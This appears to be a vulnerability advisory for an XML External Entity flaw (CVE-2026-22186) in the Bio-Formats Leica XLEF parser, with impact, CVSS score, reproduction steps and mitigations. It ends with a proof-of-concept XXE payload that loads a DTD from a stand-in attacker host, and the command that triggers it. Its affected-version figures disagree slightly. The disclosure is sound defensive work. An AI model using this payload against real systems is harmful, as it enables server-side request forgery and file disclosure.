Bio-Formats XXE in Leica Metadata Parser (CVE-2026-22186)
PreviousGetSimpleCMS-CE Stored XSS via components.php (CVE-2026-26351)NextPoC- CVE-2025-4524 - Local File Inclusion (WordPress Madara)
Last updated
Author: Beatriz Fresno Naumova, Ron Edgerson
Date: 18/03/2026 (Github Advisory)
Vendor: Open Microscopy Environment
Product: Bio-Formats
Version Affected: ≤ 8.4.0
Fixed Version: 8.5.0
Component: Leica metadata parser (XLEF)
CWE: CWE-611 – Improper Restriction of XML External Entity Reference
Attack Vector: Local
Bio-Formats versions up to and including 8.4.0 contain an XML External Entity (XXE) vulnerability in the Leica metadata parsing component (XLEF).
The parser uses an insecure configuration of DocumentBuilderFactory, allowing external entity expansion and loading of external DTDs. As a result, a specially crafted XML metadata file can trigger unintended behavior during parsing.
Successful exploitation may allow:
Server-Side Request Forgery (SSRF) via outbound network requests
Access to local system resources (if readable)
Denial of Service (DoS) during XML parsing
CVSS v3.1 Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
Base Score: 7.1 (High)
Install a vulnerable version of Bio-Formats (≤ 8.3.0).
Prepare a malicious XLEF/XML file containing an external entity:
Execute the Bio-Formats analysis tool with the crafted file:
Observe outbound network requests or unintended resource access triggered during XML parsing.
Disable external entity processing in XML parsers
Configure DocumentBuilderFactory securely:
FEATURE_SECURE_PROCESSING
Disable DTDs and external entities
Validate and sanitize XML inputs before processing
Update to a patched version when available
Beatriz Fresno Naumova
Ron Edgerson
Bio-Formats (Github Advisory): https://github.com/ome/bioformats/security/advisories/GHSA-x9vc-qh97-8gj
Last updated
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">
]>
<root>&xxe;</root>java -cp bioformats_package.jar \
loci.formats.tools.ImageInfo xxe_blind.xlef